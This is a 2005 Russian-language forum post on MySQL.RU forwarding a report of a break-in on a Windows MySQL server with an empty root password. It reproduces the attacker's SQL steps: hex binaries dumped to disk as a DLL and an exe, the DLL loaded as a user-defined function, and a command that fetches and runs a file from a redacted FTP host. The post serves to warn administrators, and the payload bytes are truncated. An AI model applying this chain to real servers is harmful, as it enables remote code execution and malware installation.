







|
MySQL.RU - Webboard
Вернуться
FWD: Possible vulnerability under Win32 (Dinky) 13/01/2005 - 18:27:38
From: Dinky - 13/01/2005 - 18:27:38
Subject:FWD: Possible vulnerability under Win32
-----------------
в баг-листе пролетело - стояло Windows XP Pro SP1 и MySQL 4.1.3-beta-nt-max-log, был пустой локальный root пароль и некто залез и установил всякие нехорошие программки :) Была выполнена примерно следующая последовательность:
===
DROP TABLE IF EXISTS filedata3
CREATE TABLE filedata3 (
filedata3 blob NOT NULL
) TYPE=MyISAM
Insert Into filedata3 (filedata3) values
(0x4D5A50000200000004....000000000000000)
SELECT filedata3 FROM filedata3 INTO DUMPFILE 'c:\\test.dll'
drop table filedata3
DROP TABLE IF EXISTS filedata5
CREATE TABLE filedata5 (
filedata5 blob NOT NULL
) TYPE=MyISAM
Insert Into filedata5 (filedata5) values
(0x4D5A50000200000004...000000000000000)
SELECT filedata5 FROM filedata5 INTO DUMPFILE 'c:\\yada.exe'
drop table filedata5
create function my_name returns string soname
'c:\\test.dll'
select my_name('start c:\\yada.exe ftp://<ip>/foo.exe bar.exe run')
===
// ip удалены, вставляемые данные покоцаны, имена изменены
--
Dmitry
[Это сообщение - спам!]
Последние сообщения из форума
Уважаемые посетители форума MySQL.RU!
Убедительная просьба, прежде чем задавать свой вопрос в этом форуме, обратите внимание на разделы:
- ответы на наиболее часто задаваемые вопросы - FAQ
- раздел документация
- раздел поиск по сообщениям форума и документации
Также, старайтесь наиболее подробно указывать свою ситуацию (версию операционной системы, версию MySQL,
версию программного обеспечения, по которому возникает вопрос, текст возникающих ошибок, и др.)
Помните, чем конкретнее Вы опишете ситуацию, тем больше шансов получить реальную помощь.
19554
|
|